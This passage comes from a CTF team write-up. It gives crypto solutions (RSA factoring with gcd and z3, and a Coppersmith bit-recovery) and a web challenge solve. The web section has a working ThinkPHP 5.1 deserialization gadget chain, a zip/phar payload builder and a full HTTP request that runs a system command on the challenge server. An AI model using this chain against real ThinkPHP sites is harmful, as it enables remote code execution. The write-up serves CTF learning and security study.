90, 62] [40, 17, 24] [81, 9, 73] [37, 92, 84] [95, 20, 29] [6, 11, 75] [11, 13, 17] [37, 90, 39] [51, 99, 53] [4, 1, 51] [54, 12, 43] [61, 89, 45] [21, 30, 90] [58, 64, 94] [7, 21, 90] [7, 59, 98] [60, 99, 14] [96, 73, 15] [23, 10, 15] [81, 9, 92] [60, 99, 14] [85, 11, 12] [79, 3, 31] [27, 48, 8] [50, 16, 82] [41, 84, 44] [25, 68, 84] [45, 43, 4] [51, 99, 53] [63, 27, 22] [90, 68, 90] [79, 32, 24] [58, 84, 89] [7, 24, 44] [96, 55, 52] [90, 68, 76] [20, 20, 60] [18, 33, 19] [11, 13, 17] [45, 55, 92] [18, 90, 62] [92, 97, 23] [7, 59, 34] [64, 70, 95] [51, 11, 12] [63, 27, 22] [44, 29, 48] [37, 95, 20] [48, 50, 96] [19, 37, 84] [45, 43, 76] [42, 56, 55] [84, 76, 25] [62, 79, 94] [90, 68, 90] [81, 9, 92] [39, 58, 85] [19, 10, 90] [50, 45, 38] [91, 13, 55] [63, 40, 92] [14, 83, 54] [68, 9, 84] [8, 17, 68] [42, 72, 6] [20, 19, 39] [13, 84, 25] [20, 9, 65] [55, 80, 32] [11, 59, 17] [25, 68, 84] [30, 57, 26] [9, 61, 84] [20, 65, 58] [14, 18, 54] [96, 1, 73] [9, 92, 73] [8, 68, 16] [40, 20, 24] [58, 20, 64] [17, 97, 23] [27, 56, 46] [90, 29, 13] [96, 55, 47] [48, 50, 96] [62, 79, 94] [67, 78, 51] [91, 13, 55] [95, 20, 29] [39, 90, 62] [23, 10, 15] [23, 54, 36] [95, 14, 73] [23, 36, 60] [23, 54, 60] [95, 14, 2] [61, 10, 90] [7, 97, 41] [35, 83, 5] [11, 13, 59] [21, 30, 90] [63, 27, 22] [54, 13, 30] [37, 90, 39] [9, 16, 60] [23, 36, 60] [49, 85, 37] [54, 13, 71] [20, 20, 60] [90, 76, 90] [27, 48, 33] [36, 48, 41] [48, 8, 33] [35, 45, 34] [42, 56, 58] [84, 75, 42] [13, 55, 48] [23, 39, 15] [27, 50, 46] [22, 96, 12] [11, 39, 68] [63, 72, 6] [23, 54, 60] [57, 42, 57] [91, 3, 0] [30, 26, 80] [22, 93, 2] [68, 9, 16] [63, 40, 92] [8, 68, 16] [35, 83, 5] [27, 50, 56] [45, 55, 38] [35, 35, 5] [46, 37, 86] [90, 29, 45] [54, 86, 17] [40, 86, 17] [71, 83, 99] [76, 51, 99] [85, 8, 37] [6, 11, 75] [1, 11, 68] [67, 78, 52] [60, 99, 14] [18, 33, 19] [90, 68, 90] [81, 9, 92] [3, 83, 31] [76, 99, 53] [49, 85, 37] [92, 94, 89] [2, 27, 22] [24, 16, 82] [76, 51, 53] [27, 54, 70] [13, 71, 30] [88, 58, 85] [39, 18, 62] [32, 15, 65] [43, 45, 34] [47, 40, 92] [9, 95, 73] [23, 10, 39] [17, 97, 23] [68, 61, 84] [32, 62, 98] [45, 43, 4] [83, 35, 5] [7, 97, 41] [35, 83, 5] [58, 20, 64] [43, 24, 44] [90, 45, 13] [71, 83, 99] [58, 20, 64] [55, 47, 52] [40, 86, 17] [45, 55, 46] [81, 9, 92] [84, 76, 25] [81, 92, 73] [8, 60, 14] [19, 80, 37] [85, 8, 37] [7, 98, 34] [35, 83, 5] [47, 65, 66] [23, 16, 91] [57, 81, 27] [10, 70, 94] [45, 87, 3] [70, 95, 19] [62, 79, 94] [18, 66, 19] [54, 75, 74] [92, 84, 21] [1, 39, 68] [68, 9, 60] [19, 80, 37] [91, 3, 0] [35, 45, 34] [37, 92, 21] [20, 9, 65] [9, 92, 73] [96, 73, 15] [7, 59, 34] [32, 62, 0]'
result=[-38, -121, -40, -125, -51, -29, -2, -21, -59, -54, -51, -40, -105, -5, -4, -50, -127, -56, -124, -128, -23, -104, -63, -112, -34, -115, -58, -99, -24, -102, -1, -5, -34, -3, -104, -103, -21, -62, -121, -24, -115, -9, -87, -56, -39, -30, -34, -4, -33, -5, -114, -21, -19, -7, -119, -107, -115, -6, -25, -27, -32, -62, -28, -20, -60, -121, -102, -10, -112, -7, -85, -110, -62, -100, -110, -29, -41, -55, -113, -112, -45, -106, -125, -25, -57, -27, -83, -2, -51, -118, -2, -10, -50, -40, -1, -82, -111, -113, -50, -48, -23, -33, -112, -38, -29, -26, -4, -40, -123, -4, -44, -120, -63, -38, -41, -22, -50, -50, -17, -122, -61, -5, -100, -22, -44, -47, -125, -125, -127, -55, -117, -100, -2, -26, -32, -111, -123, -118, -16, -24, -20, -40, -92, -40, -102, -49, -99, -45, -59, -98, -49, -13, -62, -128, -121, -114, -112, -13, -3, -4, -26, -35, -15, -35, -8, -18, -125, -14, -6, -60, -113, -104, -120, -64, -104, -55, -104, -41, -34, -106, -105, -2, -28, -14, -58, -128, -3, -1, -17, -38, -18, -12, -59, -4, -19, -82, -40, -122, -18, -42, -53, -60, -113, -40, -126, -15, -63, -40, -124, -114, -58, -26, -35, -26, -8, -48, -112, -52, -11, -117, -52, -32, -21, -38, -124, -13, -103, -6, -30, -33, -28, -31, -1, -97, -59, -64, -28, -1, -40, -2, -10, -26, -24, -3, -50, -113, -125, -122, -124, -5, -50, -62, -11, -8, -88, -109, -7, -31, -105, -54, -28, -8, -62, -58, -101, -58, -53, -124, -18, -124, -17, -109, -52, -45, -40, -109, -85, -7, -108, -121, -58, -49, -91, -102, -8, -10, -17, -55, -19, -11, -116, -47, -120, -121, -23, -99, -19, -51, -36, -110, -126, -29, -110, -9, -97, -54, -83, -86]
l=len(result)
rand=[]
dp=''
for j in range(0,l):
    random.seed(seeds[j])
    rands=[]
    for k in range(0,4):
        rands.append(random.randint(0,99))
    rand.append(rands)
    x=rands[j%4]
    f=False
    for i in range(255):
        if (~i|rands[j%4]) & (i|~rands[j%4]) ==result[j]:
            dp+=chr(i)
            f=True
    if not f:
        print('error')
print(dp)
'''

ez_equation

给了一个方程，我们设三个未知数为a,b,c，那么M1=a*a*b+b*b*a+b*b+a*b

M2=b*b*(c+1)+a*b*(c+1)-2

首先gcd(M1,M2+2)=kb

那么gcd(kb,b)=b

先求出b,然后M1,M2两个方程两个未知数，用z3直接梭出a,c

最后还有两个因子是相邻的，直接扔yafu或者开方取前后两个素数

最后再rsa解密

M1= 3826382835023788442651551584905620963555468828948525089808250303867245240492543151274589993810948153358311949129889992078565218014437985797623260774173862776314394305207460929010448541919151371739763413408901958357439883687812941802749556269540959238015960789123081724913563415951118911225765239358145144847672813272304000303248185912184454183649550881987218183213383170287341491817813853157303415010621029153827654424674781799037821018845093480149146846916972070471616774326658992874624717335369963316741346596692937873980736392272357429717437248731018333011776098084532729315221881922688633390593220647682367272566275381196597702434911557385351389179790132595840157110385379375472525985874178185477024824406364732573663044243615168471526446290952781887679180315888377262181547383953231277148364854782145192348432075591465309521454441382119502677245090726728912738123512316475762664749771002090738886940569852252159994522316
M2= 4046011043117694641224946060698160981194371746049558443191995592417947642909277226440465640195903524402898673255622570650810338780358645872293473212692240675287998097280715739093285167811740252792986119669348108850168574423371861266994630851360381835920384979279568937740516573412510564312439718402689547377548575653450519989914218115265842158616123026997554651983837361028152010675551489190669776458201696937427188572741833635865019931327548900804323792893273443467251902886636756173665823644958563664967475910962085867559357008073496875191391847757991101189003154422578662820049387899402383235828011830444034463049749668906583814229827321704450021715601349950406035896249429068630164092309047645766216852109121662629835574752784717997655595307873219503797996696389945782836994848995124776375146245061787647756704605043856735398002012276311781956668212776588970619658063515356931386886871554860891089498456646036630114620806

n=19445950132976386911852381666731799463510958712950274248183192405937223343228119407660772413067599252710235310402278345391806863116119010697766434743302798644091220730819441599784039955347398797545219314925103529062092963912855489464914723588833817280786158985269401131919618320866942737291915603551320163001129725430205164159721810319128999027215168063922977994735609079166656264150778896809813972275824980250733628895449444386265971986881443278517689428198251426557591256226431727934365277683559038777220498839443423272238231659356498088824520980466482528835994554892785108805290209163646408594682458644235664198690503128767557430026565606308422630014285982847395405342842694189025641950775231191537369161140012412147734635114986068452144499789367187760595537610501700993916441274609074477086105160306134590864545056872161818418667370690945602050639825453927168529154141097668382830717867158189131567590506561475774252148991615602388725559184925467487450078068863876285937273896246520621965096127440332607637290032226601266371916124456122172418136550577512664185685633131801385265781677598863031205194151992390159339130895897510277714768645984660240750580001372772665297920679701044966607241859495087319998825474727920273063120701389749480852403561022063673222963354420556267045325208933815212625081478538158049144348626000996650436898760300563194390820694376019146835381357141426987786643471325943646758131021529659151319632425988111406974492951170237774415667909612730440407365124264956213064305556185423432341935847320496716090528514947
from gmpy2 import *
from Crypto.Util.number import *
b=int(gcd(M1,M2+2))
b=int(gcd(b,n))
print(b)
'''
from z3 import *
s=Solver()
a,c=Ints('a c')
s.add(a*a*b+b*b*a+b*b+a*b==M1)
s.add(b*b*(c+1)+a*b*(c+1)-2==M2)
if s.check()==sat:
    print(s.model())
'''
c=124117415943883977664751123530312411127969752596554845224788157371311249476587435058606174560086595402130942432433077285727410486606936603436679072115481556559754023776771158788066029212482977191449912364572356973349619609634451941137428490832382800157920373064845282558903378297473815085357523566726409862651
a=117379993488408909213785887974472229016071265566403849836216754847295401565166151872329440545598767396499252325133419296775798211888305050776586647999185549171166433935032159605367762650398185050063643611720499373962310459705000471248897299568458251778545586376091559089442503748421906239117101764062329447353
assert n%(a*b*c)==0
p_q=n//(a*b*c)
print(p_q)
p=100879187056056327845688098549406745424207361197423093269692717108477600868962896860013904736765795306101216828969899092854909669522132180587302621989436957151756194757478353967989066938767945991388791271155482274102738851937877875741607885045831857778368069892408823414883083227349949611641923542904479147403
q=100879187056056327845688098549406745424207361197423093269692717108477600868962896860013904736765795306101216828969899092854909669522132180587302621989436957151756194757478353967989066938767945991388791271155482274102738851937877875741607885045831857778368069892408823414883083227349949611641923542904479146623
phi=(p-1)*(q-1)*(a-1)*(b-1)*(c-1)

assert n==a*b*c*p*q
d=invert(0x10001,phi)
c=1394946766416873131554934453357121730676319808212515786127918041980606746238793432614766163520054818740952818682474896886923871330780883504028665380422608364542618561981233050210507202948882989763960702612116316321009210541932155301216511791505114282546592978453573529725958321827768703566503841883490535620591951871638499011781864202874525798224508022092610499899166738864346749753379399602574550324310119667774229645827773608873832795828636770263111832990012205276425559363977526114225540962861740929659841165039419904164961095126757294762709194552018890937638480126740196955840656602020193044969685334441405413154601311657668298101837066325231888411018908300828382192203062405287670490877283269761047853117971492197659115995537837080400730294215778540754482680476723953659085854297184575548489544772248049479632420289954409052781880871933713121875562554234841599323223793407272634167421053493995795570508435905280269774274084603687516219837730100396191746101622725880529896250904142333391598426588238082485305372659584052445556638990497626342509620305749829144158797491411816819447836265318302080212452925144191536031249404138978886262136129250971366841779218675482632242265233134997115987510292911606736878578493796260507458773824689843424248233282828057027197528977864826149756573867022173521177021297886987799897923182290515542397534652789013340264587028424629766689059507844211910072808286250914059983957934670979551428204569782238857331272372035625901349763799005621577332502957693517473861726359829588419409120076625939502382579605
m=pow(c,d,n)
print(long_to_bytes(m)[256:])
#D0g3{296b680c-7aeb-5272-8b33-7335b411fbcb}

Strange

加密的是m|hint,给了m&hint和hint

首先根据hint和m&hint可以知道m中哪些比特为1

然后这些已知为1的比特，设其它未知的比特为x,那么满足copper已知部分明文攻击，求出m|hint，所以最后当m&hint为比特位为1则m对应位为1，当m|hint为1且hint为0则m对应位为1,综上可以还原m所有比特位

n,c,m2,hint=[13002904520196087913175026378157676218772224961198751789793139372975952998874109513709715017379230449514880674554473551508221946249854541352973100832075633211148140972925579736088058214014993082226530875284219933922497736077346225464349174819075866774069797318066487496627589111652333814065053663974480486379799102403118744672956634588445292675676671957278976483815342400168310432107890845293789670795394151784569722676109573685451673961309951157399183944789163591809561790491021872748674809148737825709985578568373545210653290368264452963080533949168735319775945818152681754882108865201849467932032981615400210529003, 8560367979088389639093355670052955344968008917787780010833158290316540154791612927595480968370338549837249823871244436946889198677945456273317343886485741297260557172704718731809632734567349815338988169177983222118718585249696953103962537942023413748690596354436063345873831550109098151014332237310265412976776977183110431262893144552042116871747127301026195142320678244525719655551498368460837394436842924713450715998795899172774573341189660227254331656916960984157772527015479797004423165812493802730996272276613362505737536007284308929288293814697988968407777480072409184261544708820877153825470988634588666018802, 9869907877594701353175281930839281485694004896356038595955883788511764488228640164047958227861871572990960024485992, 9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144]
h=[int(i) for i in bin(hint)[2:]]
hhh=h

h_l=len(bin(hint)[2:])

#m_l为m,hint都为1的部分
m_l=[int(i) for i in bin(m2)[2:].zfill(h_l)]
print(len(m_l))
'''
hint=0
for i in range(len(h)):
    hint+=h[i]*pow(2,len(h)-i-1)
print(hint)

def decrypt(n,e,c,mbar,kbits):
    beta = 1
    nbits = n.nbits()
    PR.<x> = PolynomialRing(Zmod(n))

    f = (mbar + x)^e - c
    x0 = f.small_roots(X=2^kbits, beta=1)[0]  
   print(x0)
    

e = 3

mbar = 9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144
kbits =400
decrypt(n,e,c,mbar,kbits)
'''
##hh为有一个为1
hh=625351281758775854436696750193519647852347112455593164676552831622184938221557439012947515328144260585439847522581
hh=[int(i) for i in bin(hh)[2:].zfill(h_l)]
'''
for i in range(h_l):
    if hh[i]==1 and h[i]==1:
        print('error')
    else:
        hhh[i]=hh[i]
'''
#hhh是有一个为1的部分
m=[0 for i in range(h_l)]
for i in range(h_l):
    if m_l[i]==1:
        m[i]=1
    if h[i]==0 and  hh[i]==1:
        m[i]=1
from Crypto.Util.number import *    
print(long_to_bytes(int(''.join(map(str,m)),2)))
    
#D0g3{R54_f4l1_1n_l0ve_with_CopperSmith_w0wow0!!}

Web

Ez_TP

存在文件泄露 www.zip

\application\index\controller\Index.php

<?php
namespace app\index\controller;
use think\Controller;

class Index extends controller
{
    public function index()
    {
        return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:) </h1><p> ThinkPHP V5.1<br/><span style="font-size:30px">12载初心不改（2006-2018） - 你值得信赖的PHP框架</span></p></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="eab4b9f840753f8e7"></think>';
    }

    public function hello()
    {
        highlight_file(__FILE__);
        $hello = base64_encode('Welcome to D0g3');
        if (isset($_GET['hello'])||isset($_POST['hello'])) exit;
        if(isset($_REQUEST['world']))
        {
            parse_str($_REQUEST['world'],$haha);
            extract($haha);
        }
        if (!isset($a)) {
            $a = 'hello.txt';
        }
        $s = base64_decode($hello);
        file_put_contents('hello.txt', $s);
        if(isset($a))
        {
            echo (file_get_contents($a));
        }
    }
}

可以通过world注册变量，覆盖$a，$hello。

鉴于题目环境是5.1.37，应该是通过file_get_contents触发phar反序列化。

实测直接phar会报错，限制了数据大小，考虑通过其他格式触发

poc：

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}


namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
//TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJsaW4iO2E6Mjp7aTowO3M6ODoiY2FsYy5leGUiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJsaW4iO086MTM6InRoaW5rXFJlcXVlc3QiOjM6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6OTtpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjM6ImxpbiI7fX19fX19
?>

将序列化内容写入zip注释，需要对特殊字符进行替换

<?php
//bypass %00
function process_serialized($serialized) {
    $new = '';
    $last = 0;
    $current = 0;
    $pattern = '#\bs:([0-9]+):"#';

    while(
        $current < strlen($serialized) &&
        preg_match(
            $pattern, $serialized, $matches, PREG_OFFSET_CAPTURE, $current
        )
    )
    {

        $p_start = $matches[0][1];
        $p_start_string = $p_start + strlen($matches[0][0]);
        $length = $matches[1][0];
        $p_end_string = $p_start_string + $length;

        # Check if this really is a serialized string
        if(!(
            strlen($serialized) > $p_end_string + 2 &&
            substr($serialized, $p_end_string, 2) == '";'
        ))
        {
            $current = $p_start_string;
            continue;
        }
        $string = substr($serialized, $p_start_string, $length);

        # Convert every special character to its S representation
        $clean_string = '';
        for($i=0; $i < strlen($string); $i++)
        {
            $letter = $string{$i};
            $clean_string .= ctype_print($letter) && $letter != '\\' ?
                $letter :
                sprintf("\\%02x", ord($letter));
            ;
        }

        # Make the replacement
        $new .=
            substr($serialized, $last, $p_start - $last) .
            'S:' . $matches[1][0] . ':"' . $clean_string . '";'
        ;
        $last = $p_end_string + 2;
        $current = $last;
    }

    $new .= substr($serialized, $last);
    return $new;

}

生成zip文件

<?php
include ("test4.php");
$p = "TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJsaW4iO2E6Mjp7aTowO3M6ODoiY2FsYy5leGUiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJsaW4iO086MTM6InRoaW5rXFJlcXVlc3QiOjM6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6OTtpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjM6ImxpbiI7fX19fX19";
$b = base64_decode($p);

echo process_serialized($b);

$b = process_serialized($b);

$zip = new ZipArchive();
$res = $zip->open('2.zip',ZipArchive::CREATE);
$zip->addFromString('ttt.txt', 'ttt');
$zip->setArchiveComment($b);
$zip->close();

读入zip文件并做加密编码

echo urlencode(base64_encode(file_get_contents("2.zip")));

请求获取flag：

POST /?s=/index/index/hello&lin=cat+/y0u_f0und_It HTTP/1.1
Host: 1.12.220.15:19274
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 773

world=a=phar://hello.txt/ttt.txt%26hello=UEsDBAoAAAAAAC6Me1NJEIKwAwAAAAMAAAAHAAAAdHR0LnR4dHR0dFBLAQI%2FAwoAAAAAAC6Me1NJEIKwAwAAAAMAAAAHAAAAAAAAAAAAAAC2gQAAAAB0dHQudHh0UEsFBgAAAAABAAEANQAAACgAAACvAU86Mjc6InRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cyI6MTp7UzozNDoiXDAwdGhpbmtcNWNwcm9jZXNzXDVjcGlwZXNcNWNXaW5kb3dzXDAwZmlsZXMiO2E6MTp7aTowO086MTc6InRoaW5rXG1vZGVsXFBpdm90IjoyOntTOjk6IlwwMCpcMDBhcHBlbmQiO2E6MTp7UzozOiJsaW4iO2E6Mjp7aTowO1M6ODoiY2FsYy5leGUiO2k6MTtTOjQ6ImNhbGMiO319UzoxNzoiXDAwdGhpbmtcNWNNb2RlbFwwMGRhdGEiO2E6MTp7UzozOiJsaW4iO086MTM6InRoaW5rXFJlcXVlc3QiOjM6e1M6NzoiXDAwKlwwMGhvb2siO2E6MTp7Uzo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjk7aToxO1M6NjoiaXNBamF4Ijt9fVM6OToiXDAwKlwwMGZpbHRlciI7Uzo2OiJzeXN0ZW0iO1M6OToiXDAwKlwwMGNvbmZpZyI7YToxOntTOjg6InZhcl9hamF4IjtTOjM6ImxpbiI7fX19fX19

补充：线下战报

安询杯线下决赛取得第二名，获得一等奖。